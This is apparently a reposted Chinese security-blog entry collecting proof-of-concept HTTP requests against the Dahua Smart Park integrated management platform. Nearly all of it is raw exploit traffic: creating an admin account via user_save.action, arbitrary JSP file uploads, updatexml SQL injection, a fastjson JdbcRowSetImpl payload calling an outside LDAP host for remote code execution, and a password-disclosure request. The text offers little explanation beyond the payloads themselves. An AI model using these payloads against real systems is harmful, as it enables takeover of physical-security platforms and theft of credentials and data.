大华 智慧园区综合管理平台 user_save.action 任意文件上传漏洞PoC

admin 2024年9月28日14:22:26评论36 views字数 4479阅读14分55秒阅读模式
POST /admin/user_save.action HTTP/1.1
Host: 
Accept-Encoding: gzip
Content-Length: 914
Content-Type: multipart/form-data; boundary=----fxwrpqcy
Cookie: JSESSIONID=65A8F19555DC1EFB09B5A8B4F0F6921C
User-Agent: Go-http-client/1.1

------fxwrpqcy
Content-Disposition: form-data; name="userBean.userType"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.ownerCode"

001
------fxwrpqcy
Content-Disposition: form-data; name="userBean.isReuse"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.macStat"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.roleIds"

1
------fxwrpqcy
Content-Disposition: form-data; name="userBean.loginName"

luqaahkf
------fxwrpqcy
Content-Disposition: form-data; name="displayedOrgName"

luqaahkf
------fxwrpqcy
Content-Disposition: form-data; name="userBean.loginPass"

lhndpuxl
------fxwrpqcy
Content-Disposition: form-data; name="checkPass"

lhndpuxl
------fxwrpqcy
Content-Disposition: form-data; name="userBean.groupId"

0
------fxwrpqcy
Content-Disposition: form-data; name="userBean.userName"

luqaahkf
------fxwrpqcy--

 

POST /WPMS/login HTTP/1.1
Host: 
Accept-Encoding: gzip
Content-Length: 271
Content-Type: application/json
User-Agent: Go-http-client/1.1

{"loginName":"luqaahkf","loginPass":"IxID6I8gKNSkCgu5UMwfRAhZpyvKKzu9q+dUngiieHiCTA52x3/uNB17NmAOletbzTOT46fLE5AOOMqMaqdDLA5rcsB3/Gql1qYwbNWLB6orKWpWEr9asUeNi/3ccIb95NUAXS1yn0l3ks94jbGT/CYbNq+JiBAeYlwcfdrqYkM=","timestamp":"16853622671401904168273612873678126378126387"}
/admin/login_login.action?subSystemToken=87a629bc14298c1533d8b52dd63e87f7
/upload/axqvssmz.jsp

大华智慧园区综合管理平台 getFaceCapture SQL注入漏洞

/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(123)),0x7e),1)--%22%7D/extend/%7B%7D

大华智慧园区综合管理平台 searchJson SQL 注入漏洞

GET/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1Host: 127.0.0.1:7443User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip, deflateConnection: close

大华智慧园区综合管理平台 video文件上传漏洞

POST /publishing/publishing/material/file/video HTTP/1.1Host: 127.0.0.1:7443User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 804Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7Accept-Encoding: gzip, deflateConnection: close--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp" <%@page contentType="text/html; charset=GBK"%><%@pageimport="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><%MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";Stringmiyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);newjava.io.File(application.getRealPath(request.getServletPath())).delete();%>--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="poc" poc--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Submit"submit--dd8f988919484abab3816881c55272a7

大华智慧园区综合管理平台  devicePoint_addImgIco文件上传漏洞

POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDTUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.69Host: xx.xx.xx.xxAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Length: 243Connection: close--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDTContent-Disposition: form-data; name="upload"; filename="1ndex.jsp"Content-Type: application/octet-streamContent-Transfer-Encoding: binary123--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT--

大华智慧园区综合管理平台 deleteFtp 接口远程命令执行漏洞

POST http://1.1.1.1/CardSolution/card/accessControl/swingCardRecord/deleteFtp HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, likeGecko) 5bGx5rW35LmL5YWzContent-Length: 205Content-Type: application/jsonAccept-Encoding: gzip, deflateConnection: close{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://cves.io","autoCommit":true}}}

大华智慧园区综合管理平台任意密码读取漏洞

GET /admin/login_login.action
GET /admin/user_getUserInfoByUserName.action?userName=system

原文始发于微信公众号(左逆安全攻防):大华 智慧园区综合管理平台 user_save.action 任意文件上传漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日14:22:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大华 智慧园区综合管理平台 user_save.action 任意文件上传漏洞PoChttps://cn-sec.com/archives/2008269.html

发表评论

匿名网友 填写信息